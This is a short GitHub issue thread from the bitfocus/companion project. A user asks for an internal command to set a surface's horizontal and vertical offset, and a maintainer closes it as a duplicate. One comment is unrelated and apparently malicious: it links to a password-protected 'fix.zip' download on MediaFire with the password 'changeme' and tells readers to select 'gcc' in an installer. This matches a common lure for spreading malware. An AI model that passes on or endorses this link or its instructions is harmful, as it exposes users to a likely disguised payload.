### ISSUE TITLE
internal command to set offset for surface

### ISSUE THREAD

**Issue by semenovnick** [bitfocus/companion#3007] opened 2024-08-27 15:53 UTC
### Is this a feature relevant to companion itself, and not a module?

- [X] I believe this to be a feature for companion, not a module

### Is there an existing issue for this?

- [X] I have searched the existing issues

### Describe the feature

It will be great to manipulate the Horizontal/Vertical offset of surface via intenal command.

### Usecases

To select page and offset via button. Now i can only set page for surface...

**Comment by c0ffincolors** [comment] 2024-08-27 16:04
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Julusian** [comment] 2024-08-27 16:16
Duplicate of #2532

**Closed by Julusian** 2024-08-27 16:16 UTC
